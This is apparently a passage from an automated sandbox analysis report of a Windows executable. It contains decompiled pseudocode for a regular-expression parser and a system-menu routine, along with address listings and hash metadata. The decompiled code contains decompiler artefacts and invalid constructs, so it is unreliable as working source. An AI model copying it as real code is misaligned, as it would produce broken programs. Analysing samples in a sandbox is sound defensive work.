                                                    									__eax = E00409BC5(__esi,  *(__ebp + 8),  *__edi,  &(__esi[4]));
                                                    									 *(__ebp - 0x10) = __eax;
                                                    									__eflags = __eax;
                                                    									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    									__eax = __ebp - 0x14;
                                                    									 *(__ebp - 0x14) = __cl;
                                                    									__ecx = __ebp - 0x24;
                                                    									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    									__ecx = __ebp - 0x14;
                                                    									goto L95;
                                                    								}
                                                    								__eflags = __eax - 0xa;
                                                    								if(__eax < 0xa) {
                                                    									L50:
                                                    									__ecx =  *__edi;
                                                    									__edx =  &(__esi[4]);
                                                    									__eax = E00409C62(__eax,  *__edi,  &(__esi[4]));
                                                    									 *(__ebp - 0x10) = __eax;
                                                    									__eflags = __eax;
                                                    									__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    									__eax = __ebp - 0x14;
                                                    									 *(__ebp - 0x14) = __cl;
                                                    									__ecx = __ebp - 0x24;
                                                    									__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    									__ecx = __ebp - 0x14;
                                                    									E00406ED3(__ecx) =  *(__ebp - 0x28);
                                                    									 *__ebx =  *(__ebp - 0x28);
                                                    									goto L18;
                                                    								}
                                                    								__eflags = __eax - __esi[0xb];
                                                    								if(__eax >= __esi[0xb]) {
                                                    									goto L51;
                                                    								}
                                                    								goto L50;
                                                    							}
                                                    							__ecx =  *__edi;
                                                    							__eax = __eax - 1;
                                                    							__edx =  &(__esi[4]);
                                                    							 *__ebx = __eax;
                                                    							__al =  *__eax;
                                                    							__eax = E00409BC5(__esi, __eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							_t273 = __eax != 0;
                                                    							__eflags = _t273;
                                                    							__ecx = __ecx & 0xffffff00 | _t273;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L44;
                                                    						case 9:
                                                    							goto L18;
                                                    						case 0xa:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E0040811C();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xb:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E004081D0();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xc:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E00408154();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xd:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E00408208();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xe:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E004080D8();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0xf:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E0040818C();
                                                    							__eax = E00409B0F(__eax,  *__edi,  &(__esi[4]));
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x10:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							__eax = E00409B68(__eflags,  *__edi);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x11:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							__eax = E00409B87(__eflags,  *__edi);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x12:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							__eax = E00409BA6(__eflags,  *__edi);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x13:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							_push( *__edi);
                                                    							_push(1);
                                                    							__eax = E00409A43();
                                                    							__esp = __esp + 0xc;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x14:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push( &(__esi[4]));
                                                    							_push( *__edi);
                                                    							_push(0);
                                                    							__eax = E00409A43();
                                                    							__esp = __esp + 0xc;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x15:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push(__ecx);
                                                    							_push( *__edi);
                                                    							__eax = E00409A9D(__ecx, __eflags);
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 0x16:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push(__ecx);
                                                    							_push( *__edi);
                                                    							__eax = E00409AD6(__ecx, __eflags);
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							L95:
                                                    							__eax = E00406ED3(__ecx);
                                                    							goto L18;
                                                    						case 0x17:
                                                    							__eax =  *__ebx;
                                                    							 *(__ebp - 0x28) = __eax;
                                                    							 *(__ebp + 0x10) = __eax;
                                                    							while(1) {
                                                    								__ecx = __esi[0x27];
                                                    								 *(__ebp + 8) = __esi[0x27];
                                                    								__eax =  *0x41720c();
                                                    								__eax =  *(__ebp + 8);
                                                    								__ecx =  *(__eax + 4);
                                                    								__eax =  *(__eax + 8);
                                                    								__edx = __ecx;
                                                    								__eax = __eax + __ecx;
                                                    								__edx =  ~__ecx;
                                                    								asm("sbb edx, edx");
                                                    								__edx =  ~__ecx & __eax;
                                                    								__eflags = ( ~__ecx & __eax) -  *__ebx;
                                                    								if(( ~__ecx & __eax) ==  *__ebx) {
                                                    									break;
                                                    								}
                                                    								__ecx = __esi[0x27];
                                                    								 *(__ebp + 8) = __esi[0x27];
                                                    								__eax =  *0x41720c();
                                                    								__eax =  *(__ebp + 8);
                                                    								__ecx =  *(__eax + 4);
                                                    								__eax =  *(__eax + 8);
                                                    								__edx = __ecx;
                                                    								__eax = __eax + __ecx;
                                                    								__edx =  ~__ecx;
                                                    								asm("sbb edx, edx");
                                                    								__ecx = __edi;
                                                    								__eax = E00406B23(__ecx, __ebx, __edx);
                                                    								__eflags = __eax;
                                                    								if(__eax == 0) {
                                                    									__ecx = __esi[0x27];
                                                    									 *(__ebp + 8) = __esi[0x27];
                                                    									__eax =  *0x41720c();
                                                    									__eax =  *(__ebp + 8);
                                                    									__ecx =  *(__eax + 4);
                                                    									__eax =  *(__eax + 8);
                                                    									__edx = __ecx;
                                                    									__eax = __eax + __ecx;
                                                    									__edx =  ~__ecx;
                                                    									asm("sbb edx, edx");
                                                    									__edx =  ~__ecx & __eax;
                                                    									__eax =  *__ebx;
                                                    									__eflags = __edx - __eax;
                                                    									if(__edx != __eax) {
                                                    										__eax = __eax + 1;
                                                    										__eflags = __eax;
                                                    										 *__ebx = __eax;
                                                    									}
                                                    									L106:
                                                    									__eax =  *__ebx;
                                                    									 *(__ebp - 0x28) =  *__ebx;
                                                    									continue;
                                                    								}
                                                    								__eflags = __eax - 0x21;
                                                    								if(__eax == 0x21) {
                                                    									break;
                                                    								}
                                                    								goto L106;
                                                    							}
                                                    							__eax =  *(__ebp - 0x28);
                                                    							__eflags = __eax -  *(__ebp + 0x10);
                                                    							if(__eax !=  *(__ebp + 0x10)) {
                                                    								__edi =  *__edi;
                                                    								_push(__esi);
                                                    								_push(__edi);
                                                    								_push(__eax);
                                                    								_push( *(__ebp + 0x10));
                                                    								__eax = E0040A5B8();
                                                    								__ecx =  *(__ebp + 0xc);
                                                    								__esp = __esp + 0x10;
                                                    								__edx =  *(__ecx + 0x1c);
                                                    								 *( *(__ecx + 0x1c)) = __eax;
                                                    								 *(__ecx + 0x1c) = __eax;
                                                    							}
                                                    							goto L20;
                                                    						case 0x18:
                                                    							__al =  *((intOrPtr*)(__ebp + 0xf));
                                                    							_push(0);
                                                    							__ecx = __ebp - 0x74;
                                                    							 *(__ebp - 0x74) =  *((intOrPtr*)(__ebp + 0xf));
                                                    							__eax =  *0x417230();
                                                    							__esi = "quotemeta turned off, but was never turned on";
                                                    							_push(__esi);
                                                    							L004153D6();
                                                    							_pop(__ecx);
                                                    							_push(__eax);
                                                    							_push(__esi);
                                                    							__ecx = __ebp - 0x74;
                                                    							 *0x417234() = __ebp - 0x74;
                                                    							__ecx = __ebp - 0xf0;
                                                    							 *((char*)(__ebp - 4)) = 7;
                                                    							__eax = E00404FA7(__ebp - 0xf0, __ebp - 0x74);
                                                    							 *((intOrPtr*)(__ebp - 0xef7b)) =  *((intOrPtr*)(__ebp - 0xef7b)) - 1;
                                                    							goto [far dword [eax-0x8];
                                                    					}
                                                    				} else {
                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t568 + 0xc)) + 0x10)) != 0) {
                                                    						 *((char*)(_t568 - 0x1c)) =  *((intOrPtr*)(_t568 + 0xf));
                                                    						 *0x417230(0);
                                                    						_t567 = "mismatched parenthesis";
                                                    						 *0x417234(_t567, strlen(_t567));
                                                    						 *(_t568 - 4) = 2;
                                                    						E00404FA7(_t568 - 0x80, _t568 - 0x1c);
                                                    						_push(0x4196f8);
                                                    						_push(_t568 - 0x80);
                                                    						 *((intOrPtr*)(_t568 - 0x80)) = 0x417698;
                                                    						L004153FE();
                                                    					}
                                                    					 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
                                                    					E0040C5ED(_t568 - 0x30);
                                                    					 *(_t568 - 4) =  *(_t568 - 4) | 0xffffffff;
                                                    					E00406ED3(_t568 - 0x24);
                                                    					_t487 = 0;
                                                    					L21:
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t568 - 0xc));
                                                    					return _t487;
                                                    				}
                                                    			}















                                                    0x00000000
                                                    0x00000000
                                                    0x004053a4
                                                    0x004053a6
                                                    0x004053ab
                                                    0x004053b0
                                                    0x004053b1
                                                    0x004053b4
                                                    0x004053b5
                                                    0x004053b7
                                                    0x004053ba
                                                    0x004053bd
                                                    0x004053c1
                                                    0x004053c4
                                                    0x004053c9
                                                    0x00000000
                                                    0x00000000
                                                    0x004053d1
                                                    0x004053d6
                                                    0x004053db
                                                    0x004053de
                                                    0x004053e1
                                                    0x004053e3
                                                    0x004053e7
                                                    0x00405400
                                                    0x00405400
                                                    0x004053e9
                                                    0x004053e9
                                                    0x004053ec
                                                    0x004053ef
                                                    0x004053f0
                                                    0x004053f5
                                                    0x004053f8
                                                    0x004053f8
                                                    0x00405402
                                                    0x00405404
                                                    0x00405407
                                                    0x0040540a
                                                    0x0040540d
                                                    0x00405411
                                                    0x00405414
                                                    0x00405418
                                                    0x0040541d
                                                    0x00405420
                                                    0x00405425
                                                    0x00405428
                                                    0x0040542b
                                                    0x00405431
                                                    0x00405435
                                                    0x00405438
                                                    0x0040543b
                                                    0x0040543d
                                                    0x0040543f
                                                    0x00405441
                                                    0x00405443
                                                    0x0040544b
                                                    0x00405450
                                                    0x00405452
                                                    0x00405455
                                                    0x00405456
                                                    0x00405457
                                                    0x0040545a
                                                    0x0040545f
                                                    0x00405462
                                                    0x00405465
                                                    0x00405467
                                                    0x0040546a
                                                    0x0040546d
                                                    0x00405471
                                                    0x00405474
                                                    0x00405479
                                                    0x0040547c
                                                    0x00405481
                                                    0x00000000
                                                    0x00000000
                                                    0x0040548a
                                                    0x0040548c
                                                    0x00405491
                                                    0x00405496
                                                    0x00405497
                                                    0x0040549a
                                                    0x0040549b
                                                    0x0040549d
                                                    0x004054a0
                                                    0x004054a3
                                                    0x004054a7
                                                    0x004054aa
                                                    0x004054af
                                                    0x00000000
                                                    0x00000000
                                                    0x00405730
                                                    0x00405733
                                                    0x00405736
                                                    0x0040573c
                                                    0x0040573f
                                                    0x00405742
                                                    0x00405745
                                                    0x00405747
                                                    0x00405749
                                                    0x0040574b
                                                    0x0040574d
                                                    0x0040574f
                                                    0x00405751
                                                    0x00405753
                                                    0x00405790
                                                    0x00405792
                                                    0x00405795
                                                    0x004058a6
                                                    0x004058a6
                                                    0x004058a9
                                                    0x004058de
                                                    0x004058e1
                                                    0x0040597f
                                                    0x00405982
                                                    0x00405a4e
                                                    0x00405a51
                                                    0x00405a8c
                                                    0x00405a8c
                                                    0x00405a8f
                                                    0x00405aca
                                                    0x00405aca
                                                    0x00405acd
                                                    0x00405b08
                                                    0x00405b08
                                                    0x00405b0b
                                                    0x00405b43
                                                    0x00405b43
                                                    0x00405b46
                                                    0x00405b7e
                                                    0x00405b7e
                                                    0x00405b81
                                                    0x00405bc1
                                                    0x00405bc1
                                                    0x00405bc2
                                                    0x00405bc3
                                                    0x00405bc8
                                                    0x00405bc9
                                                    0x00405bcb
                                                    0x00405bcc
                                                    0x00405bfd
                                                    0x00405bff
                                                    0x00405c04
                                                    0x00405c06
                                                    0x00405c09
                                                    0x00405c11
                                                    0x00405c14
                                                    0x00405c16
                                                    0x00405c19
                                                    0x00405c1c
                                                    0x00405c20
                                                    0x00405c23
                                                    0x00405c28
                                                    0x00405bce
                                                    0x00405bce
                                                    0x00405bd0
                                                    0x00405bd6
                                                    0x00405bde
                                                    0x00405be1
                                                    0x00405be3
                                                    0x00405be6
                                                    0x00405be9
                                                    0x00405bed
                                                    0x00405bf0
                                                    0x00405bf5
                                                    0x00405bf5
                                                    0x00405784
                                                    0x00405784
                                                    0x00405789
                                                    0x00000000
                                                    0x00405789
                                                    0x00405b83
                                                    0x00405b87
                                                    0x00000000
                                                    0x00000000
                                                    0x00405b89
                                                    0x00405b8a
                                                    0x00405b8d
                                                    0x00405b8f
                                                    0x00405b95
                                                    0x00405b9d
                                                    0x00405ba0
                                                    0x00405ba2
                                                    0x00405ba2
                                                    0x00405ba2
                                                    0x00405ba5
                                                    0x00405ba8
                                                    0x00405bac
                                                    0x00405baf
                                                    0x00405bb4
                                                    0x00000000
                                                    0x00405bb4
                                                    0x00405b48
                                                    0x00405b4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00405b4e
                                                    0x00405b4f
                                                    0x00405b52
                                                    0x00405b54
                                                    0x00405b5a
                                                    0x00405b62
                                                    0x00405b65
                                                    0x00405b67
                                                    0x00405b6a
                                                    0x00405b6d
                                                    0x00405b71
                                                    0x00405b74
                                                    0x00405b79
                                                    0x00000000
                                                    0x00405b79
                                                    0x00405b0d
                                                    0x00405b11
                                                    0x00000000
                                                    0x00000000
                                                    0x00405b13
                                                    0x00405b14
                                                    0x00405b17
                                                    0x00405b19
                                                    0x00405b1f
                                                    0x00405b27
                                                    0x00405b2a
                                                    0x00405b2c
                                                    0x00405b2f
                                                    0x00405b32
                                                    0x00405b36
                                                    0x00405b39
                                                    0x00405b3e
                                                    0x00000000
                                                    0x00405b3e
                                                    0x00405acf
                                                    0x00405ad3
                                                    0x00000000
                                                    0x00000000
                                                    0x00405ad5
                                                    0x00405ad6
                                                    0x00405ad9
                                                    0x00405adb
                                                    0x00405ae1
                                                    0x00405ae9
                                                    0x00405aec
                                                    0x00405aee
                                                    0x00405af1
                                                    0x00405af4
                                                    0x00405af8
                                                    0x00405afb
                                                    0x00405b00
                                                    0x00000000
                                                    0x00405b00
                                                    0x00405a91
                                                    0x00405a95
                                                    0x00000000
                                                    0x00000000
                                                    0x00405a97
                                                    0x00405a98
                                                    0x00405a9b
                                                    0x00405a9d
                                                    0x00405aa3
                                                    0x00405aab
                                                    0x00405aae
                                                    0x00405ab0
                                                    0x00405ab3
                                                    0x00405ab6
                                                    0x00405aba
                                                    0x00405abd
                                                    0x00405ac2
                                                    0x00000000
                                                    0x00405ac2
                                                    0x00405a53
                                                    0x00405a57
                                                    0x00000000
                                                    0x00000000
                                                    0x00405a59
                                                    0x00405a5a
                                                    0x00405a5d
                                                    0x00405a5f
                                                    0x00405a65
                                                    0x00405a6d
                                                    0x00405a70
                                                    0x00405a72
                                                    0x00405a75
                                                    0x00405a78
                                                    0x00405a7c
                                                    0x00405a7f
                                                    0x00405a84
                                                    0x00000000
                                                    0x00405a84
                                                    0x00405988
                                                    0x0040598b
                                                    0x0040598e
                                                    0x00405994
                                                    0x00405997
                                                    0x0040599a
                                                    0x0040599c
                                                    0x0040599f
                                                    0x004059a1
                                                    0x004059a3
                                                    0x004059a5
                                                    0x004059a7
                                                    0x004059a9
                                                    0x004059ab
                                                    0x004059ad
                                                    0x004059af
                                                    0x004059b2
                                                    0x004059b4
                                                    0x004059b7
                                                    0x004059ba
                                                    0x004059c0
                                                    0x004059c6
                                                    0x004059cb
                                                    0x004059cc
                                                    0x004059cd
                                                    0x004059ce
                                                    0x004059d7
                                                    0x004059da
                                                    0x004059e1
                                                    0x004059ea
                                                    0x004059f0
                                                    0x004059f5
                                                    0x004059f6
                                                    0x00405a00
                                                    0x00405a00
                                                    0x00405a05
                                                    0x00405a07
                                                    0x00405a08
                                                    0x00405a0a
                                                    0x00405a0c
                                                    0x00405a0e
                                                    0x00405a10
                                                    0x00405a12
                                                    0x00405a15
                                                    0x00405a16
                                                    0x00405a1c
                                                    0x00405a1c
                                                    0x00405a10
                                                    0x00405a1d
                                                    0x00405a1f
                                                    0x00405a23
                                                    0x00405a27
                                                    0x00405a2f
                                                    0x00405a32
                                                    0x00405a34
                                                    0x00405a37
                                                    0x00405a3a
                                                    0x00405a3e
                                                    0x00405a41
                                                    0x00405a46
                                                    0x00000000
                                                    0x00405a46
                                                    0x004058e7
                                                    0x004058eb
                                                    0x004058ef
                                                    0x004058ef
                                                    0x004058f0
                                                    0x004058f2
                                                    0x004058f2
                                                    0x004058f5
                                                    0x004058f8
                                                    0x004058fe
                                                    0x00405901
                                                    0x00405904
                                                    0x00405907
                                                    0x00405909
                                                    0x0040590b
                                                    0x0040590d
                                                    0x0040590f
                                                    0x00405911
                                                    0x00405913
                                                    0x00405915
                                                    0x00000000
                                                    0x00000000
                                                    0x00405917
                                                    0x00405919
                                                    0x0040591b
                                                    0x00405921
                                                    0x00405921
                                                    0x00405923
                                                    0x00405929
                                                    0x00405929
                                                    0x0040592b
                                                    0x00000000
                                                    0x00000000
                                                    0x0040592d
                                                    0x0040592f
                                                    0x00000000
                                                    0x00000000
                                                    0x00405931
                                                    0x00405932
                                                    0x00405938
                                                    0x0040593b
                                                    0x0040593e
                                                    0x00405940
                                                    0x00405943
                                                    0x00405945
                                                    0x00405949
                                                    0x0040594c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040594c
                                                    0x00405925
                                                    0x00405927
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405927
                                                    0x0040591d
                                                    0x0040591f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040591f
                                                    0x0040594e
                                                    0x00405950
                                                    0x00405958
                                                    0x00405960
                                                    0x00405963
                                                    0x00405965
                                                    0x00405968
                                                    0x0040596b
                                                    0x0040596f
                                                    0x00405972
                                                    0x00405977
                                                    0x00000000
                                                    0x00405977
                                                    0x004058ab
                                                    0x004058ac
                                                    0x004058af
                                                    0x004058b1
                                                    0x004058b7
                                                    0x004058bf
                                                    0x004058c2
                                                    0x004058c4
                                                    0x004058c7
                                                    0x004058ca
                                                    0x004058ce
                                                    0x004058d1
                                                    0x004058d6
                                                    0x00000000
                                                    0x004058d6
                                                    0x0040579b
                                                    0x0040579e
                                                    0x00000000
                                                    0x00000000
                                                    0x004057a4

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: strlen$ExceptionThrow$H_prolog
                                                    • String ID: mismatched parenthesis
                                                    • API String ID: 1639010532-3804012542
                                                    • Opcode ID: d6babdc1cd365e2e1e8502f498082d8db2161f20e5f97c3c9e293608a4966727
                                                    • Instruction ID: dbdd704d0f857427ebeb39f116f656dece123dea06476c1553e1f9c4206b7acd
                                                    • Opcode Fuzzy Hash: d6babdc1cd365e2e1e8502f498082d8db2161f20e5f97c3c9e293608a4966727
                                                    • Instruction Fuzzy Hash: 1CD18F75905209DFCB04DFA4C995AEEBBB4EF44304F1080AEE816B7281DB78AE05CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlentolowertoupper
                                                    • String ID: invalid range specified in character set
                                                    • API String ID: 1623458934-400550818
                                                    • Opcode ID: d408190d57219a03c27e133eefc1f35bfc50e08c6d9d172808e4cf878ccc8899
                                                    • Instruction ID: 8689beaf87658f235b18adbd55520a84ac800dc3010e3d19cb195d65f9f5d29c
                                                    • Opcode Fuzzy Hash: d408190d57219a03c27e133eefc1f35bfc50e08c6d9d172808e4cf878ccc8899
                                                    • Instruction Fuzzy Hash: A2313972540115AFCB04DF64D8916FD7BB4EF44361F10806FF966CA181C7B89A85CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlentolowertoupper
                                                    • String ID: invalid range specified in character set
                                                    • API String ID: 1623458934-400550818
                                                    • Opcode ID: 0e24881944c7c0c498e365fc8964e77618a0ccef3bb12c5c82b08ac14b24d4ad
                                                    • Instruction ID: cd9e26891659f9ba17b876740d84c57d5df747751494f0963a811352e82b1091
                                                    • Opcode Fuzzy Hash: 0e24881944c7c0c498e365fc8964e77618a0ccef3bb12c5c82b08ac14b24d4ad
                                                    • Instruction Fuzzy Hash: 9E311432500155AFDB08DF64D8917FDBBB4EF44350F10806BF566DA1C1DBB89A85CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E0040199E(void* __ecx) {
                                                    				struct HMENU__* _t19;
                                                    				void* _t22;
                                                    				struct HMENU__* _t27;
                                                    				void* _t41;
                                                    				void* _t43;
                                                    
                                                    				L004153D0();
                                                    				_push(__ecx);
                                                    				_t41 = __ecx;
                                                    				L00415232();
                                                    				_t19 = GetSystemMenu( *(__ecx + 0x20), 0);
                                                    				_push(_t19);
                                                    				L00415304();
                                                    				_t27 = _t19;
                                                    				if(_t27 != 0) {
                                                    					L004152EC();
                                                    					_push(0x65);
                                                    					 *(_t43 - 4) = 0;
                                                    					L004152FE();
                                                    					if( *((intOrPtr*)( *(_t43 - 0x10) - 8)) != 0) {
                                                    						AppendMenuA( *(_t27 + 4), 0x800, 0, 0);
                                                    						AppendMenuA( *(_t27 + 4), 0, 0x10,  *(_t43 - 0x10));
                                                    					}
                                                    					 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
                                                    					L00415214();
                                                    				}
